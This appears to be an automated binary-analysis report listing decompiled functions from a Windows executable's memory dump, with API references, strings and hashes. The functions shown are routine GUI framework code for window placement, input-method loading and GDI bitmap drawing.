Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ActiveEnabledFocusIconicNtdllProc_
String ID:
API String ID: 3996302123-0
Opcode ID: 730f7c70c4e062e7b5e6c6a54ab183b9a426efba0a4dbcfcd3680863ffd867a6
Instruction ID: a3ebcee7396711d3e00125f8aaa75dd9aa02ea69c567b2c3d64d2d41e53cdeca
Opcode Fuzzy Hash: 730f7c70c4e062e7b5e6c6a54ab183b9a426efba0a4dbcfcd3680863ffd867a6
Instruction Fuzzy Hash: 2A312170B046409BEB14AB69CD95B6637A86F05705F0801ABBE00EF2D7DA7DEC888759

Uniqueness

Uniqueness Score: -1.00%

Function 0043BC20, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81
windowCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E0043BC20(void* __eax, int __ecx, int __edx, int _a4, int _a8) {
				void* _v20;
				struct _WINDOWPLACEMENT _v48;
				char _v64;
				void* _t31;
				int _t45;
				int _t51;
				void* _t52;
				int _t56;
				int _t58;

				_t56 = __ecx;
				_t58 = __edx;
				_t52 = __eax;
				if(__edx !=  *((intOrPtr*)(__eax + 0x40)) || __ecx !=  *((intOrPtr*)(__eax + 0x44)) || _a8 !=  *((intOrPtr*)(__eax + 0x48))) {
					L4:
					if(E0043C4F8(_t52) == 0) {
						L7:
						 *(_t52 + 0x40) = _t58;
						 *(_t52 + 0x44) = _t56;
						 *((intOrPtr*)(_t52 + 0x48)) = _a8;
						 *((intOrPtr*)(_t52 + 0x4c)) = _a4;
						_t31 = E0043C4F8(_t52);
						__eflags = _t31;
						if(_t31 != 0) {
							_v48.length = 0x2c;
							GetWindowPlacement( *(_t52 + 0x180),  &_v48);
							E00435514(_t52,  &_v64);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							SetWindowPlacement( *(_t52 + 0x180),  &_v48);
						}
						L9:
						E004351C8(_t52);
						return E004037D8(_t52, _t66);
					}
					_t45 = IsIconic( *(_t52 + 0x180));
					_t66 = _t45;
					if(_t45 != 0) {
						goto L7;
					}
					SetWindowPos( *(_t52 + 0x180), 0, _t58, _t56, _a8, _a4, 0x14);
					goto L9;
				} else {
					_t51 = _a4;
					if(_t51 ==  *((intOrPtr*)(__eax + 0x4c))) {
						return _t51;
					}
					goto L4;
				}
			}

APIs

IsIconic.USER32 ref: 0043BC5F
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 0043BC7D
GetWindowPlacement.USER32(?,0000002C), ref: 0043BCB3
SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 0043BCD7

Strings

,, xrefs: 0043BCA1

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Placement$Iconic
String ID: ,
API String ID: 568898626-3772416878
Opcode ID: 61bb0041f070bdc7d4d6a620951ce1077ea930391e219bd71c86ea1f686e33e1
Instruction ID: 1f861a72d3cf7d1a47b6ae4a07e5aa439d0d01450f76f4d5502414f5fab386b5
Opcode Fuzzy Hash: 61bb0041f070bdc7d4d6a620951ce1077ea930391e219bd71c86ea1f686e33e1
Instruction Fuzzy Hash: A6212171A00108ABCF54EE69C8C1A9A77A8EF4D314F04946AFE14EF346DB75ED048BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00454F4C, Relevance: 7.6, APIs: 5, Instructions: 59
nativewindowCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00454F4C(void* __eax) {
				struct HWND__* _t21;
				void* _t40;

				_t40 = __eax;
				_t21 = IsIconic( *(__eax + 0x30));
				if(_t21 == 0) {
					E00454660();
					SetActiveWindow( *(_t40 + 0x30));
					if( *((intOrPtr*)(_t40 + 0x44)) == 0 ||  *((char*)(_t40 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t40 + 0x44)) + 0x57)) == 0 || IsWindowEnabled(E0043C1F4( *((intOrPtr*)(_t40 + 0x44)))) == 0) {
						_t21 = E00453FF4( *(_t40 + 0x30), 6, __eflags);
					} else {
						_t43 =  *((intOrPtr*)(_t40 + 0x44));
						SetWindowPos( *(_t40 + 0x30), E0043C1F4( *((intOrPtr*)(_t40 + 0x44))),  *( *((intOrPtr*)(_t40 + 0x44)) + 0x40),  *( *((intOrPtr*)(_t40 + 0x44)) + 0x44),  *(_t43 + 0x48), 0, 0x40);
						_push(0);
						_push(0xf020);
						_push(0x112);
						_t21 =  *(_t40 + 0x30);
						_push(_t21);
						L00406D8C();
					}
					if( *((short*)(_t40 + 0x102)) != 0) {
						return  *((intOrPtr*)(_t40 + 0x100))();
					}
				}
				return _t21;
			}

APIs

IsIconic.USER32 ref: 00454F54
SetActiveWindow.USER32(?,?,?,?,004555E4), ref: 00454F6C
IsWindowEnabled.USER32(00000000), ref: 00454F8F
SetWindowPos.USER32(?,00000000,?,?,?,00000000,00000040,00000000,?,?,?,?,004555E4), ref: 00454FB8
NtdllDefWindowProc_A.USER32(?,00000112,0000F020,00000000,?,00000000,?,?,?,00000000,00000040,00000000,?,?), ref: 00454FCD

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ActiveEnabledIconicNtdllProc_
String ID:
API String ID: 1720852555-0
Opcode ID: ad03ebd0f3e8e311cdf5e5300eccb440042bde9c7c6e0408e7eaf941df049234
Instruction ID: b7d07c3e81a0296378add28009795847762988f30e702c32772d708d515b7fa3
Opcode Fuzzy Hash: ad03ebd0f3e8e311cdf5e5300eccb440042bde9c7c6e0408e7eaf941df049234
Instruction Fuzzy Hash: 67111271604240ABDF54EE6DC9C6F5637ACAF48309F08106AFE04DF287D679EC849724

Uniqueness

Uniqueness Score: -1.00%

Function 00427394, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00427394(void* __edi, struct HWND__* _a4, signed int _a8) {
				struct _WINDOWPLACEMENT _v48;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t19;
				intOrPtr _t21;
				struct HWND__* _t23;

				_t19 = _a8;
				_t23 = _a4;
				if( *0x492ac5 != 0) {
					if((_t19 & 0x00000003) == 0) {
						if(IsIconic(_t23) == 0) {
							GetWindowRect(_t23,  &(_v48.rcNormalPosition));
						} else {
							GetWindowPlacement(_t23,  &_v48);
						}
						return E00427304( &(_v48.rcNormalPosition), _t19);
					}
					return 0x12340042;
				}
				_t21 =  *0x492aa0; // 0x427394
				 *0x492aa0 = E00427194(1, _t19, _t21, __edi, _t23);
				return  *0x492aa0(_t23, _t19);
			}

0x0042739c
0x0042739f
0x004273a9
0x004273d3
0x004273e4
0x004273f7
0x004273e6
0x004273eb
0x004273eb
0x00000000
0x00427401
0x00000000
0x004273d5
0x004273b0
0x004273bd
0x00000000

Strings

MonitorFromWindow, xrefs: 004273AB

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc
String ID: MonitorFromWindow
API String ID: 190572456-2842599566
Opcode ID: a14943776bb286ad595f323769ec3cc7a69c20f54c36c4ddb03cce01831f9130
Instruction ID: 83b475725e4d9881bc0f68c93cdb8858a68a55a1d8f153db513f2c4250c396f2
Opcode Fuzzy Hash: a14943776bb286ad595f323769ec3cc7a69c20f54c36c4ddb03cce01831f9130
Instruction Fuzzy Hash: 7F01AD3260A038AAC711EB50AD81EBF775CEF05364B84403BFC06A7242D77C9906D3AE

Uniqueness

Uniqueness Score: -1.00%

Function 0043061C, Relevance: 6.0, APIs: 4, Instructions: 46
sleepCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0043061C(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				CHAR* _t20;
				long _t25;
				intOrPtr _t30;
				void* _t34;
				intOrPtr _t37;

				_push(0);
				_t34 = __eax;
				_push(_t37);
				_push(0x430699);
				_push( *[fs:eax]);
				 *[fs:eax] = _t37;
				E00430068(__eax);
				_t25 = GetTickCount();
				do {
					Sleep(0);
				} while (GetTickCount() - _t25 <= 0x3e8);
				E0042FCC0(_t34, _t25,  &_v8, 0, __edi, _t34);
				if(_v8 != 0) {
					_t20 = E004047F8(_v8);
					WinHelpA( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x1c)))) + 0xc))(), _t20, 9, 0);
				}
				_pop(_t30);
				 *[fs:eax] = _t30;
				_push(0x4306a0);
				return E00404348( &_v8);
			}

APIs

Part of subcall function 00430068: WinHelpA.USER32 ref: 00430077

GetTickCount.KERNEL32 ref: 0043063A
Sleep.KERNEL32(00000000,00000000,00430699,?,?,00000000,00000000,?,0043060F), ref: 00430643
GetTickCount.KERNEL32 ref: 00430648
WinHelpA.USER32 ref: 0043067E

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CountHelpTick$Sleep
String ID:
API String ID: 2438605093-0
Opcode ID: 307853dfaaaca8895fa90b21484c890783f8255f017dd7281ba543b6550d1dbe
Instruction ID: 75981a8233ee4d01c2f1e5df9000261321f57b032b19e9e9952387f5457eb5df
Opcode Fuzzy Hash: 307853dfaaaca8895fa90b21484c890783f8255f017dd7281ba543b6550d1dbe
Instruction Fuzzy Hash: D8018F70700604AFE311FBBACC63B1DB2A8DB88B14F62417BF504A76C1DA786E10856D

Uniqueness

Uniqueness Score: -1.00%

Function 00439CA4, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00439CA4(void* __eax, intOrPtr* __edx) {
				char _v20;
				char _v28;
				void* __edi;
				intOrPtr _t17;
				void* _t19;
				void* _t21;
				void* _t32;
				void* _t39;
				void* _t45;
				intOrPtr _t47;
				intOrPtr _t48;
				void* _t50;
				void* _t51;
				void* _t65;
				intOrPtr* _t66;
				intOrPtr* _t68;
				void* _t69;

				_t68 = __edx;
				_t50 = __eax;
				_t17 =  *__edx;
				_t69 = _t17 - 0x84;
				if(_t69 > 0) {
					_t19 = _t17 + 0xffffff00 - 9;
					if(_t19 < 0) {
						_t21 = E004362E4(__eax);
						if(_t21 != 0) {
							L28:
							return _t21;
						}
						L27:
						return E00436DF4(_t50, _t68);
					}
					if(_t19 + 0xffffff09 - 0xb < 0) {
						_t21 = E00439C10(__eax, _t51, __edx);
						if(_t21 == 0) {
							goto L27;
						}
						if( *((intOrPtr*)(_t68 + 0xc)) != 0) {
							goto L28;
						}
						_t21 = E0043C4F8(_t50);
						if(_t21 == 0) {
							goto L28;
						}
						_push( *((intOrPtr*)(_t68 + 8)));
						_push( *((intOrPtr*)(_t68 + 4)));
						_push( *_t68);
						_t32 = E0043C1F4(_t50);
						_push(_t32);
						L00406D8C();
						return _t32;
					}
					goto L27;
				}
				if(_t69 == 0) {
					_t21 = E00436DF4(__eax, __edx);
					if( *((intOrPtr*)(__edx + 0xc)) != 0xffffffff) {
						goto L28;
					}
					E004072E8( *((intOrPtr*)(__edx + 8)), _t51,  &_v20);
					E004356B8(_t50,  &_v28,  &_v20);
					_t21 = E00439B7C(_t50, 0,  &_v28, _t65, 0);
					if(_t21 == 0) {
						goto L28;
					}
					 *((intOrPtr*)(_t68 + 0xc)) = 1;
					return _t21;
				}
				_t39 = _t17 - 7;
				if(_t39 == 0) {
					_t66 = E0044CA0C(__eax);
					if(_t66 == 0) {
						goto L27;
					}
					_t21 =  *((intOrPtr*)( *_t66 + 0xe4))();
					if(_t21 == 0) {
						goto L28;
					}
					goto L27;
				}
				_t21 = _t39 - 1;
				if(_t21 == 0) {
					if(( *(__eax + 0x54) & 0x00000020) != 0) {
						goto L28;
					}
				} else {
					if(_t21 == 0x17) {
						_t45 = E0043C1F4(__eax);
						if(_t45 == GetCapture() &&  *0x4769c0 != 0) {
							_t47 =  *0x4769c0; // 0x0
							if(_t50 ==  *((intOrPtr*)(_t47 + 0x30))) {
								_t48 =  *0x4769c0; // 0x0
								E00436D28(_t48, 0, 0x1f, 0);
							}
						}
					}
				}
			}

APIs

GetCapture.USER32 ref: 00439DC8

Strings

, xrefs: 00439D1A

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Capture
String ID:
API String ID: 1145282425-3916222277
Opcode ID: 9bcc22c7be471c5a05c3657320bc811d13cf008686eb6c568fa4ffafb8aa2774
Instruction ID: 7b750f2d1ec484cf15bdf7c55352870e6a5630c910734ca3872b29b0e5d8de39
Opcode Fuzzy Hash: 9bcc22c7be471c5a05c3657320bc811d13cf008686eb6c568fa4ffafb8aa2774
Instruction Fuzzy Hash: 9C318B713002015BCA20EE3E888765B6296AB4D319F10B93FB456CB782DABCDC09C78D

Uniqueness

Uniqueness Score: -1.00%

Function 00440918, Relevance: 49.1, APIs: 15, Strings: 13, Instructions: 95
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00440918() {
				int _v8;
				intOrPtr _t4;
				struct HINSTANCE__* _t11;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t15;
				struct HINSTANCE__* _t17;
				struct HINSTANCE__* _t19;
				struct HINSTANCE__* _t21;
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t25;
				struct HINSTANCE__* _t27;
				struct HINSTANCE__* _t29;
				intOrPtr _t40;
				intOrPtr _t42;
				intOrPtr _t44;

				_t42 = _t44;
				_t4 =  *0x49129c; // 0x4927f0
				if( *((char*)(_t4 + 0xc)) == 0) {
					return _t4;
				} else {
					_v8 = SetErrorMode(0x8000);
					_push(_t42);
					_push(0x440a7e);
					_push( *[fs:eax]);
					 *[fs:eax] = _t44;
					if( *0x492bc0 == 0) {
						 *0x492bc0 = GetProcAddress(GetModuleHandleA("USER32"), "WINNLSEnableIME");
					}
					if( *0x476a2c == 0) {
						 *0x476a2c = LoadLibraryA("IMM32.DLL");
						if( *0x476a2c != 0) {
							_t11 =  *0x476a2c; // 0x0
							 *0x492bc4 = GetProcAddress(_t11, "ImmGetContext");
							_t13 =  *0x476a2c; // 0x0
							 *0x492bc8 = GetProcAddress(_t13, "ImmReleaseContext");
							_t15 =  *0x476a2c; // 0x0
							 *0x492bcc = GetProcAddress(_t15, "ImmGetConversionStatus");
							_t17 =  *0x476a2c; // 0x0
							 *0x492bd0 = GetProcAddress(_t17, "ImmSetConversionStatus");
							_t19 =  *0x476a2c; // 0x0
							 *0x492bd4 = GetProcAddress(_t19, "ImmSetOpenStatus");
							_t21 =  *0x476a2c; // 0x0
							 *0x492bd8 = GetProcAddress(_t21, "ImmSetCompositionWindow");
							_t23 =  *0x476a2c; // 0x0
							 *0x492bdc = GetProcAddress(_t23, "ImmSetCompositionFontA");
							_t25 =  *0x476a2c; // 0x0
							 *0x492be0 = GetProcAddress(_t25, "ImmGetCompositionStringA");
							_t27 =  *0x476a2c; // 0x0
							 *0x492be4 = GetProcAddress(_t27, "ImmIsIME");
							_t29 =  *0x476a2c; // 0x0
							 *0x492be8 = GetProcAddress(_t29, "ImmNotifyIME");
						}
					}
					_pop(_t40);
					 *[fs:eax] = _t40;
					_push(0x440a85);
					return SetErrorMode(_v8);
				}
			}

APIs

SetErrorMode.KERNEL32(00008000), ref: 00440931
GetModuleHandleA.KERNEL32(USER32,00000000,00440A7E,?,00008000), ref: 00440955
GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00440962
LoadLibraryA.KERNEL32(IMM32.DLL,00000000,00440A7E,?,00008000), ref: 0044097E
GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 004409A0
GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 004409B5
GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 004409CA
GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 004409DF
GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 004409F4
GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 00440A09
GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 00440A1E
GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 00440A33
GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 00440A48
GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00440A5D
SetErrorMode.KERNEL32(?,00440A85,00008000), ref: 00440A78

Strings

ImmSetOpenStatus, xrefs: 004409E9
IMM32.DLL, xrefs: 00440979
WINNLSEnableIME, xrefs: 0044095C
ImmReleaseContext, xrefs: 004409AA
ImmNotifyIME, xrefs: 00440A52
ImmIsIME, xrefs: 00440A3D
ImmSetCompositionFontA, xrefs: 00440A13
ImmGetCompositionStringA, xrefs: 00440A28
ImmSetCompositionWindow, xrefs: 004409FE
ImmSetConversionStatus, xrefs: 004409D4
ImmGetContext, xrefs: 00440995
ImmGetConversionStatus, xrefs: 004409BF
USER32, xrefs: 00440950

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorMode$HandleLibraryLoadModule
String ID: IMM32.DLL$ImmGetCompositionStringA$ImmGetContext$ImmGetConversionStatus$ImmIsIME$ImmNotifyIME$ImmReleaseContext$ImmSetCompositionFontA$ImmSetCompositionWindow$ImmSetConversionStatus$ImmSetOpenStatus$USER32$WINNLSEnableIME
API String ID: 3397921170-3271328588
Opcode ID: 7e5b88a2ce515de4a660b4f5b801804f178233d851fc15e527dcdd22126a6ba4
Instruction ID: 22175355cffe4bfeaf4df66fa745304b851485a7c6d64ee71613be57ccea2247
Opcode Fuzzy Hash: 7e5b88a2ce515de4a660b4f5b801804f178233d851fc15e527dcdd22126a6ba4
Instruction Fuzzy Hash: F831B6B1650B00EFE740EFB5ED16A253BE9E319304B12843BF209B7591C67D98608F5C

Uniqueness

Uniqueness Score: -1.00%

Function 00420CA0, Relevance: 37.7, APIs: 25, Instructions: 248
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00420CA0(struct HDC__* __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, int _a4, int _a8, struct HDC__* _a12, int _a16, int _a20, int _a24, int _a28, struct HDC__* _a32, int _a36, int _a40) {
				int _v8;
				int _v12;
				char _v13;
				struct HDC__* _v20;
				void* _v24;
				void* _v28;
				long _v32;
				long _v36;
				struct HPALETTE__* _v40;
				intOrPtr* _t78;
				struct HPALETTE__* _t89;
				struct HPALETTE__* _t95;
				int _t171;
				intOrPtr _t178;
				intOrPtr _t180;
				struct HDC__* _t182;
				int _t184;
				void* _t186;
				void* _t187;
				intOrPtr _t188;

				_t186 = _t187;
				_t188 = _t187 + 0xffffffdc;
				_v12 = __ecx;
				_v8 = __edx;
				_t182 = __eax;
				_t184 = _a16;
				_t171 = _a20;
				_v13 = 1;
				_t78 =  *0x491294; // 0x4760ac
				if( *_t78 != 2 || _t171 != _a40 || _t184 != _a36) {
					_v40 = 0;
					_v20 = E00420AFC(CreateCompatibleDC(0));
					_push(_t186);
					_push(0x420f20);
					_push( *[fs:eax]);
					 *[fs:eax] = _t188;
					_v24 = E00420AFC(CreateCompatibleBitmap(_a32, _t171, _t184));
					_v28 = SelectObject(_v20, _v24);
					_t89 =  *0x492a28; // 0xc40806be
					_v40 = SelectPalette(_a32, _t89, 0);
					SelectPalette(_a32, _v40, 0);
					if(_v40 == 0) {
						_t95 =  *0x492a28; // 0xc40806be
						_v40 = SelectPalette(_v20, _t95, 0xffffffff);
					} else {
						_v40 = SelectPalette(_v20, _v40, 0xffffffff);
					}
					RealizePalette(_v20);
					StretchBlt(_v20, 0, 0, _t171, _t184, _a12, _a8, _a4, _t171, _t184, 0xcc0020);
					StretchBlt(_v20, 0, 0, _t171, _t184, _a32, _a28, _a24, _t171, _t184, 0x440328);
					_v32 = SetTextColor(_t182, 0);
					_v36 = SetBkColor(_t182, 0xffffff);
					StretchBlt(_t182, _v8, _v12, _a40, _a36, _a12, _a8, _a4, _t171, _t184, 0x8800c6);
					StretchBlt(_t182, _v8, _v12, _a40, _a36, _v20, 0, 0, _t171, _t184, 0x660046);
					SetTextColor(_t182, _v32);
					SetBkColor(_t182, _v36);
					if(_v28 != 0) {
						SelectObject(_v20, _v28);
					}
					DeleteObject(_v24);
					_pop(_t178);
					 *[fs:eax] = _t178;
					_push(E00420F27);
					if(_v40 != 0) {
						SelectPalette(_v20, _v40, 0);
					}
					return DeleteDC(_v20);
				} else {
					_v24 = E00420AFC(CreateCompatibleBitmap(_a32, 1, 1));
					_v24 = SelectObject(_a12, _v24);
					_push(_t186);
					_push(0x420d73);
					_push( *[fs:eax]);
					 *[fs:eax] = _t188;
					MaskBlt(_t182, _v8, _v12, _a40, _a36, _a32, _a28, _a24, _v24, _a8, _a4, E004072DC(0xaa0029, 0xcc0020));
					_pop(_t180);
					 *[fs:eax] = _t180;
					_push(E00420F27);
					_v24 = SelectObject(_a12, _v24);
					return DeleteObject(_v24);
				}
			}

0x00420ca1
0x00420ca3
0x00420ca9
0x00420cac
0x00420caf
0x00420cb1
0x00420cb4
0x00420cb7
0x00420cbb
0x00420cc3
0x00420d7c
0x00420d8b
0x00420d90
0x00420d91
0x00420d96
0x00420d99
0x00420dac
0x00420dbc
0x00420dc1
0x00420dd0
0x00420ddd
0x00420de6
0x00420dfe
0x00420e0d
0x00420de8
0x00420df7
0x00420df7
0x00420e14
0x00420e36
0x00420e58
0x00420e65
0x00420e73
0x00420e9a
0x00420ebf
0x00420ec9
0x00420ed3
0x00420edc
0x00420ee6
0x00420ee6
0x00420eef
0x00420ef6
0x00420ef9
0x00420efc
0x00420f05
0x00420f11
0x00420f11
0x00420f1f
0x00420cdb
0x00420ced
0x00420cfd
0x00420d02
0x00420d03
0x00420d08
0x00420d0b
0x00420d47
0x00420d4e
0x00420d51
0x00420d54
0x00420d66
0x00420d72
0x00420d72

APIs

CreateCompatibleBitmap.GDI32(?,00000001,00000001), ref: 00420CE3
SelectObject.GDI32(?,?), ref: 00420CF8
MaskBlt.GDI32(?,?,?,?,?,?,00000000,004200BB,?,?,?,00000000,00000000,00420D73,?,?), ref: 00420D47
SelectObject.GDI32(?,?), ref: 00420D61
DeleteObject.GDI32(?), ref: 00420D6D
CreateCompatibleDC.GDI32(00000000), ref: 00420D81
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00420DA2
SelectObject.GDI32(?,?), ref: 00420DB7
SelectPalette.GDI32(?,C40806BE,00000000), ref: 00420DCB
SelectPalette.GDI32(?,?,00000000), ref: 00420DDD
SelectPalette.GDI32(?,00000000,000000FF), ref: 00420DF2
SelectPalette.GDI32(?,C40806BE,000000FF), ref: 00420E08
RealizePalette.GDI32(?), ref: 00420E14
StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 00420E36
StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,004200BB,?,?,00440328), ref: 00420E58
SetTextColor.GDI32(?,00000000), ref: 00420E60
SetBkColor.GDI32(?,00FFFFFF), ref: 00420E6E
StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 00420E9A
StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 00420EBF
SetTextColor.GDI32(?,004200BB), ref: 00420EC9
SetBkColor.GDI32(?,00000000), ref: 00420ED3
SelectObject.GDI32(?,00000000), ref: 00420EE6
DeleteObject.GDI32(?), ref: 00420EEF
SelectPalette.GDI32(?,00000000,00000000), ref: 00420F11
DeleteDC.GDI32(?), ref: 00420F1A

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Select$ObjectPalette$ColorStretch$CompatibleCreateDelete$BitmapText$MaskRealize
String ID:
API String ID: 3976802218-0
Opcode ID: e46734b3120b9fb45e56f05c3c235d6f6d7b806e49154c27e96bb5ae4097e2ef
Instruction ID: 6ce8f87c1483c625ac59be190c9dabbc2dba2da038d769515a819c8c7bb72e09
Opcode Fuzzy Hash: e46734b3120b9fb45e56f05c3c235d6f6d7b806e49154c27e96bb5ae4097e2ef
Instruction Fuzzy Hash: 3681C5B1A04219AFDB50EFA9CD85EAF77FCEB0C714F114459F618E7281C279AD108B68

Uniqueness

Uniqueness Score: -1.00%

Function 00424094, Relevance: 31.7, APIs: 21, Instructions: 194
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00424094(void* __eax, long __ecx, struct HPALETTE__* __edx) {
				struct HBITMAP__* _v8;
				struct HDC__* _v12;
				struct HDC__* _v16;
				struct HDC__* _v20;
				char _v21;
				void* _v28;
				void* _v32;
				intOrPtr _v92;
				intOrPtr _v96;
				int _v108;
				int _v112;
				void _v116;
				int _t68;
				long _t82;
				void* _t117;
				intOrPtr _t126;
				intOrPtr _t127;
				long _t130;
				struct HPALETTE__* _t133;
				void* _t137;
				void* _t139;
				intOrPtr _t140;

				_t137 = _t139;
				_t140 = _t139 + 0xffffff90;
				_t130 = __ecx;
				_t133 = __edx;
				_t117 = __eax;
				_v8 = 0;
				if(__eax == 0 || GetObjectA(__eax, 0x54,  &_v116) == 0) {
					return _v8;
				} else {
					E00423588(_t117);
					_v12 = 0;
					_v20 = 0;
					_push(_t137);
					_push(0x42428f);
					_push( *[fs:eax]);
					 *[fs:eax] = _t140;
					_v12 = E00420AFC(GetDC(0));
					_v20 = E00420AFC(CreateCompatibleDC(_v12));
					_v8 = CreateBitmap(_v112, _v108, 1, 1, 0);
					if(_v8 == 0) {
						L18:
						_t68 = 0;
						_pop(_t126);
						 *[fs:eax] = _t126;
						_push(0x424296);
						if(_v20 != 0) {
							_t68 = DeleteDC(_v20);
						}
						if(_v12 != 0) {
							return ReleaseDC(0, _v12);
						}
						return _t68;
					} else {
						_v32 = SelectObject(_v20, _v8);
						if(_t130 != 0x1fffffff) {
							_v16 = E00420AFC(CreateCompatibleDC(_v12));
							_push(_t137);
							_push(0x424247);
							_push( *[fs:eax]);
							 *[fs:eax] = _t140;
							if(_v96 == 0) {
								_v21 = 0;
							} else {
